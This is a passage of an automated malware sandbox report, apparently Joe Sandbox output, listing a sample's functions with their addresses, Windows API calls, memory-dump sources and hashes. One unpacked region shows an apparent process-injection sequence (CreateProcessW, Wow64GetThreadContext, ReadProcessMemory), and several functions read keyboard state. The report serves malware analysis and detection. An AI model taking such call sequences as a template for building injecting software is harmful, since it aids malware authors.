                                                                                                                            Function 00401B70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _wcslen.LIBCMT ref: 00401B71
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                            • String ID: @EXITCODE
                                                                                                                            • API String ID: 580348202-3436989551
                                                                                                                            • Opcode ID: cf09f8cc563ea490457be074e3f36df2996e570d733701a8ccb845f104b99734
                                                                                                                            • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                                                                            • Opcode Fuzzy Hash: cf09f8cc563ea490457be074e3f36df2996e570d733701a8ccb845f104b99734
                                                                                                                            • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                                                                            Function 0040EFE0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                            • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                                                            • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                            • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                                                            Function 0041511A Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock_file_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 26237723-0
                                                                                                                            • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                            • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                                                            • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                            • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                                                            Function 00414E94 Relevance: 3.0, APIs: 2, Instructions: 39COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                            • __lock_file.LIBCMT ref: 00414EE4
                                                                                                                              • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                                                                            • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 717694121-0
                                                                                                                            • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                            • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                                                                            • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                            • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                                                                            Function 03DDB2A5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 03DDBA63
                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03DDBAF9
                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03DDBB1B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204938950.0000000003DDA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DDA000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3dda000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2438371351-0
                                                                                                                            • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                            • Instruction ID: 1da81ebcbc0dde1ed2edc61285775e5f2b1af53404ac9f84d0c7deb3e38499a0
                                                                                                                            • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                            • Instruction Fuzzy Hash: 2F12CE24E24658C6EB24DF64D8507DEB232FF68700F1090E9910DEB7A5E77A4F81CB5A
                                                                                                                            Function 00410D40 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                            • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                            • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                                                            Function 004092C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                                                            • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                                                            • Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                                                            • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                                                            Function 00401108 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 181713994-0
                                                                                                                            • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                            • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                                                            • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                            • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                                                            Function 0041AA31 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 10892065-0
                                                                                                                            • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                            • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                                                            • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                            • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                                                            Function 00444343 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                                                            • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$PointerWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 539440098-0
                                                                                                                            • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                            • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                                                            • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                            • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                                                            Function 0040116E Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 181713994-0
                                                                                                                            • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                            • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                                                            • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                            • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                                                            Function 00414E06 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wfsopen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 197181222-0
                                                                                                                            • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                            • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                                                            • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                            • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                                                            Function 0040D900 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2962429428-0
                                                                                                                            • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                            • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                                                            • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                            • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                                                            Function 03DDC2A8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 03DDC2B9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204938950.0000000003DDA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DDA000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3dda000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                            • Instruction ID: 482bc51b083e0196e67c6fa166b0d02895c052f309a771d67e21577c681e4336
                                                                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                            • Instruction Fuzzy Hash: F0E0BF7498110D9FDB00DFA8D54969D7BB4EF04301F1001A1FD0192280D6309A508A62

                                                                                                                            Non-executed Functions

                                                                                                                            Function 0047C08E Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 676windowkeyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                                                            • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                                                            • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                                                            • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                                                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                                                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                                                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                                                            • SendMessageW.USER32 ref: 0047C2FB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$State$LongProcWindow
                                                                                                                            • String ID: @GUI_DRAGID$F
                                                                                                                            • API String ID: 1562745308-4164748364
                                                                                                                            • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                            • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                                                            • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                            • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                                                                            Function 004045E0 Relevance: 46.9, Strings: 35, Instructions: 3193COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
                                                                                                                            • API String ID: 0-3772701627
                                                                                                                            • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                            • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                                                                            • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                            • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                                                                            Function 004375B0 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 126threadkeyboardwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
